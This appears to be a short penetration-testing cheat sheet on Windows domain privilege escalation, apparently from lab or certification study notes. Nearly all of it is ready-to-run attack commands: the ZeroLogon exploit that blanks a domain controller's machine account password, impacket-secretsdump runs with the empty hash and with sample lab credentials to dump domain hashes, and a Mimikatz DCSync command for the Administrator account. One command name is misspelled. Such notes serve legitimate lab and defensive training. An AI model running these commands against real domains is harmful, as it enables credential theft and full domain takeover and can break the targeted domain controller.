x

Domain Privilege Escalation

24.8.1 - ZeroLogon Vulnerability

Try Zerologon (requires reset after use as account pw is set to empty)

Set computer account password to an empty string.

python3 set_empty_pw.py [dc_computername] [dc_ip]
python3 set_empty_pw.py xor-dc01 10.11.1.120

Dump domain credentials

impacket-secretsdump -hashes :[empty_password_hash] '[domain]/[dc_computername]$@[dc_ip]'
impacket-secretsdump -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'xor/xor-dc01$@x.x.x.x'
impacket-secretsdummp domain/user@10.0.0.1

Some secretsdump flags

DCSync via GetChanges and GetChangesAll Privileges

Note the permissions over the domain. If you have credentials for the user, you can perform a dcsync attack to get the password hash of an arbitrary principal using Mimikatz, if you don't have remote access as the compromised user, you can still use secretsdump.

lsadump::dcsync /domain:testlab.local /user:Administrator
impacket-secretsdump 'administrator.htb'/'ethan':'limpbizkit'@'10.129.7.13'    
Left-click: follow link, Right-click: select node, Scroll: zoom
x